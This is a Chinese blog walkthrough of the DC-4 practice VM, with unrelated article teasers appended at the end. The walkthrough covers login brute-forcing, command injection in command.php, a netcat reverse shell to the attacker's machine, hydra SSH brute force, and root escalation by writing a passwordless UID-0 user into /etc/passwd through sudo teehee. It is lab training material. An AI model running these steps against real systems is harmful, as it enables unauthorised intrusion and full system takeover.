当前位置：首页 > news >正文

【DC渗透系列】DC-4靶场

news 2025/12/28 22:16:34

主机发现

arp-scan -l

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6b:ed:27, IPv4: 192.168.100.251
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1   00:50:56:c0:00:08       VMware, Inc.
192.168.100.2   00:50:56:fc:f2:a6       VMware, Inc.
192.168.100.24  00:0c:29:36:b4:4e       VMware, Inc.
192.168.100.254 00:50:56:fe:f1:0e       VMware, Inc.4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.964 seconds (130.35 hosts/sec). 4 responded

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n 192.168.100.24
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-03 21:13 EST
Nmap scan report for 192.168.100.24
Host is up (0.00015s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
MAC Address: 00:0C:29:36:B4:4E (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT     ADDRESS
1   0.15 ms 192.168.100.24OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.16 seconds

浏览器访问

在这里插入图片描述

探测站点

在这里插入图片描述

┌──(root㉿kali)-[~]
└─# whatweb -v 192.168.100.24
WhatWeb report for http://192.168.100.24
Status    : 200 OK
Title     : System Tools
IP        : 192.168.100.24
Country   : RESERVED, ZZSummary   : HTML5, HTTPServer[nginx/1.15.10], nginx[1.15.10], PasswordField[password]Detected Plugins:
[ HTML5 ]HTML version 5, detected by the doctype declaration [ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. String       : nginx/1.15.10 (from server string)[ PasswordField ]find password fields String       : password (from field name)[ nginx ]Nginx (Engine-X) is a free, open-source, high-performance HTTP server and reverse proxy, as well as an IMAP/POP3 proxy server. Version      : 1.15.10Website     : http://nginx.net/HTTP Headers:HTTP/1.1 200 OKServer: nginx/1.15.10Date: Sun, 04 Feb 2024 02:17:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close

目录探测

敏感目录探测

┌──(root㉿kali)-[~]
└─# nikto -h 192.168.100.24                                                                             
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.100.24
+ Target Hostname:    192.168.100.24
+ Target Port:        80
+ Start Time:         2024-02-03 21:23:47 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2024-02-03 21:24:04 (GMT-5) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.100.24                                                                         _|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /root/reports/_192.168.100.24/_24-02-03_21-24-11.txtTarget: http://192.168.100.24/[21:24:11] Starting: 
[21:24:23] 302 -  704B  - /command.php  ->  index.php                       
[21:24:24] 301 -  170B  - /css  ->  http://192.168.100.24/css/              
[21:24:29] 403 -  556B  - /images/                                          
[21:24:29] 301 -  170B  - /images  ->  http://192.168.100.24/images/
[21:24:29] 403 -   15B  - /index.pHp                                        
[21:24:31] 302 -  206B  - /login.php  ->  index.php                         
[21:24:31] 302 -  163B  - /logout.php  ->  index.php                        Task Completed

一开始想到sql注入但是没有找到注入点

爆破

抓包后送到intruder进行爆破用户admin得到密码happy
在这里插入图片描述

拿到密码登录

在这里插入图片描述
点击commad后发现可能存在任意命令执行漏洞

在这里插入图片描述
抓个包，发现ls -l命令是radio参数后的值

改成pwd后放包试试
存在漏洞，有远程代码执行漏洞可以利用此漏洞进行反弹shell

开起监听

nc -lvvp 8888

弹shell

nc+-e+/bin/bash+192.168.100.251+8888
nc -e /bin/bash 192.168.100.251 8888
# kali IP

在这里插入图片描述

开启交互界面

python -c 'import pty;pty.spawn("/bin/sh")'

在这里插入图片描述
在home里发现三个人物

只有cd到jim里有内容

backups里面有老密码，mbox不够权限

$ ls
ls
backups  mbox  test.sh
$ cd backups
cd backups
$ ls
ls
old-passwords.bak
$ cd ..
cd ..
$ cd mbox
cd mbox
/bin/sh: 53: cd: can't cd to mbox

把里面的密码取出来存着先命名为jim.txt
在这里插入图片描述

可以开始爆破了捏

直接使用jim参数用-l！

hydra -l jim -P jim.txt 192.168.100.24 ssh

在这里插入图片描述

使用jim登录

在这里插入图片描述
查看mbox

jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)(envelope-from <root@dc-4>)id 1hCiQe-0000gc-ECfor jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: ROThis is a test.

是一封邮件
看看jim有没有root权限

jim@dc-4:~$ sudo -lWe trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:#1) Respect the privacy of others.#2) Think before you type.#3) With great power comes great responsibility.[sudo] password for jim: 
Sorry, user jim may not run sudo on dc-4.

很遗憾，没有
linux的邮件目录是/var/spool/mail
看到刚才那封邮件那就查看一下是否存在该目录
发现charls密码^xHhA&hvim0y
在这里插入图片描述
转换用户，发现一个teehee用户可以使用root无密码权限

我们可以使用keehee添加root权限用户

echo "yiyi::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

teehee可以通过修改该文件达到添加用户的效果，文件格式为

注册名:口令:用户标识号:组标识号:用户名:用户主目录:命令解析程序

口令为x即代表存放有密码，为空即代表没有密码，识标号为0代表root权限

su yiyi
whoami

在这里插入图片描述
进入root目录获取flag

【DC渗透系列】DC-4靶场

主机发现 arp-scan -l┌──(root㉿kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:6b:ed:27, IPv4: 192.168.100.251 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.100.1 00:50:56:c0:00:08 …...

编程日记 2024/2/5 14:32:53

开源软件全景解析：驱动技术创新与行业革新的力量

目录什么是开源开源的核心开源软件的特点为什么程序员应该拥抱开源 1.学习机会： 2.社区支持： 3.提高职业竞争力： 4.加速开发过程： 5.贡献和回馈： 开源软件的影响力开源软件多元分析： 开源…...

编程日记 2024/2/5 14:31:52

目标检测及相关算法介绍

文章目录目标检测介绍目标检测算法分类目标检测算法模型组成经典目标检测论文目标检测介绍目标检测是计算机视觉领域中的一项重要任务，旨在识别图像或视频中的特定对象的位置并将其与不同类别中的对象进行分类。与图像分类任务不同，目标检测不仅需要…...

编程日记 2024/2/5 14:28:48

跟着cherno手搓游戏引擎【20】混合（blend）

抽象： Renderer.h: #pragma once #include"RenderCommand.h" #include "OrthographicCamera.h" #include"Shader.h" namespace YOTO {class Renderer {public:static void Init();static void BeginScene(OrthographicCamera& …...

编程日记 2024/2/5 14:27:47

leetcode 3.无重复字符的最长字串(滑动窗口) （C++）DAY2

文章目录 1.题目示例提示 2.解答思路3.实现代码结果 4.总结 1.题目给定一个字符串 s ，请你找出其中不含有重复字符的最长子串的长度。示例示例 1: 输入: s “abcabcbb” 输出: 3 解释: 因为无重复字符的最长子串是 “abc”，所以其长度为 3。示…...

编程日记 2024/2/5 14:24:44

Android Build 依赖项

在项目中的Build.Gradle文件中dependencies代码块中添加指定依赖项。有三种不同类型的依赖项本地模块依赖项 implementation project(:mylibrary)这个mylibrary 必须在 settings.gradle 中使用的库名称相同本地文件依赖项 implementation fileTree(dir: libs, include:…...

编程日记 2024/2/5 14:22:42

SpringMVC精简知识点

SpringMVC 数据格式化基本数据类型和字符串自动转换特殊数据类型和字符串自动转换验证及国际化应用实例注意事项和使用细节注解的结合使用数据类型转换校验核心类-DatBinder取消某个属性的绑定中文乱码解决处理json和HttpMessageConverter<T>作业布置SpringMVC文件上传自…...

编程日记 2024/2/5 14:19:38

如何写好论文——（17）如何用批判性思维检阅文献

在写论文的时候，往往需要引用很多文献资料，作为论点来证明我们的研究目标是合理的。在讨论和结论中，我们往往也需要引用很多的文献资料和我们自己的研究结果放在一起，来证明我们的研究结果是有意义的。所以在选择文献资料的时候&a…...

编程日记 2024/2/5 14:17:35

git将项目的某次签入遴选（Cherry-Pick）另一个项目

需求：将项目Product，分支feature/platform，签入959294ce6b75ee48c5cb22c46d7398654628a896，遴选到项目BRP，分支dev 第一步：使用原签入生成patch文件（git format-patch -1 <commit_hash>&a…...

编程日记 2024/2/5 14:14:33

开源节点框架STNodeEditor使用

节点，一般都为树形Tree结构，如TreeNode，XmlNode。树形结构有其关键属性Parent【父节点】，Children【子节点】 LinkedListNode为链表线性结构，有其关键属性Next【下一个】，Previous【上一个】&#xff0c…...

编程日记 2024/2/5 14:12:30

算法每日一题： Nim游戏 | 找规律

哈哈，大家好，我是星恒，今天的每日一题真开心，连做了3天牢，终于ak了一道，太不容易了这道题其实就是找规律，刚开始我还以为是动归，但是列举了不少例子之后，发现有自己直接…...

编程日记 2024/2/5 14:11:29

分类预测 | Matlab实现GAF-PCNN-MATT格拉姆角场和双通道PCNN融合多头注意力机制的分类预测/故障识别

分类预测 | Matlab实现GAF-PCNN-MATT格拉姆角场和双通道PCNN融合多头注意力机制的分类预测/故障识别目录分类预测 | Matlab实现GAF-PCNN-MATT格拉姆角场和双通道PCNN融合多头注意力机制的分类预测/故障识别分类效果基本描述程序设计参考资料分类效果基本描述 1.Matlab实现G…...

编程日记 2024/2/5 14:07:25

Dockerfile保留字

目录一、Dockerfile保留字是什么？ 二、Docker构建流程 1. 从基础镜像运行容器 2. 执行指令并修改容器 3. 提交新的镜像层 4. 基于新镜像运行新容器 5. 执行下一条指令 6. 循环执行指令 7. 所有指令执行完成三、保留字 1. FROM 使用基础镜像作为起点 2.…...

编程日记 2024/2/5 14:06:24

Linux的7个运行级别

目录 1、有那7个运行级别？ 2、那么如何查看运行级别呢?　 3、那么我想临时切换运行级别? 4、那么我想修改配置文件中的运行级别呢? 1、有那7个运行级别？ 0：停机状态。系统默认运行级别不能设置为0，否则系统不能正常启动&a…...

编程日记 2024/2/5 14:04:20

Linux期末总复习( 详解 )

文章目录一、选择题二、填空题三、简答题四、操作题一、选择题 1.在创建Linux分区时，一定要创建（ D ）两个分区 A. FAT/NTFS B. FAT/SWAP C. NTFS/SWAP D.SWAP/根分区 2.在Red Hat Linux 9 中，系统默认的&#xf…...

编程日记 2024/2/5 14:00:17

【Linux系统化学习】进程等待

目录进程等待进程等待的必要性进程等待的方法 wait方法等待一个进程(阻塞等待） waitpid方法任意等待多个进程（阻塞等待） 父进程获取子进程的退出信息非阻塞轮询等待进程等待进程等待的必要性之前讲过，子进程退…...

编程日记 2024/2/5 13:59:15

前端学习笔记 | HTML5+CSS3静态网页制作的技巧（持续更新）

注：本文的css样式均使用less写法 1、字体居中 （1）先text-align:center;行内元素水平居中 （2）再line-heigh:(盒子高度);行内元素垂直居中 text-align: center;line-height: ( 30 / vw ); 2、盒子居中情景1&#…...

编程日记 2024/2/5 13:58:14

docker安装-centos

Docker CE 支持 64 位版本 CentOS 7，并且要求内核版本不低于 3.10 卸载旧版本Docker sudo yum remove docker \ docker-common \ docker-selinux \ docker-engine使用yum安装 yum 更新到最新版本: sudo yum update执行以下命令安装依赖包： sudo yum…...

编程日记 2024/2/5 13:56:12

Redis入门指南

文章目录 Redis概述Redis基本数据类型Redis与MySQL的区别以及使用场景如何保持双写一致性（缓存一致性）1. 延迟双删2. 分布式锁（强一致性时使用）3. 中间件 Redis持久化机制RDB（redis database）AOF&#xff0…...

编程日记 2024/2/5 13:54:10

K8s之configMap

1. 概述 1.1 什么是configMap 1.1 什么是configMap configMap是Kubernetes中的一种资源对象，用于存储配置数据。它可以包含键值对，也可以包含来自文件的配置数据。configMap的作用是将配置数据与应用程序的容器分离，使得配置可以在不重…...

编程日记 2024/2/5 13:53:09

谷歌浏览器插件

项目中有时候会用到插件 sync-cookie-extension1.0.0：开发环境同步测试 cookie 至 localhost，便于本地请求服务携带 cookie 参考地址：https://juejin.cn/post/7139354571712757767 里面有源码下载下来，加在到扩展即可使用FeHelp…...

编程新知 2025/8/16 3:55:30

shell脚本--常见案例

1、自动备份文件或目录 2、批量重命名文件 3、查找并删除指定名称的文件： 4、批量删除文件 5、查找并替换文件内容 6、批量创建文件 7、创建文件夹并移动文件 8、在文件夹中查找文件...

编程新知 2025/12/13 20:03:16

线程同步：确保多线程程序的安全与高效！

全文目录： 开篇语前序前言第一部分：线程同步的概念与问题1.1 线程同步的概念1.2 线程同步的问题1.3 线程同步的解决方案第二部分：synchronized关键字的使用2.1 使用 synchronized修饰方法2.2 使用 synchronized修饰代码块第三部分&#xff…...

编程新知 2025/9/24 16:02:40

Nginx server_name 配置说明

Nginx 是一个高性能的反向代理和负载均衡服务器，其核心配置之一是 server 块中的 server_name 指令。server_name 决定了 Nginx 如何根据客户端请求的 Host 头匹配对应的虚拟主机（Virtual Host）。 1. 简介 Nginx 使用 server_name 指令来确定…...

编程新知 2025/9/6 16:47:17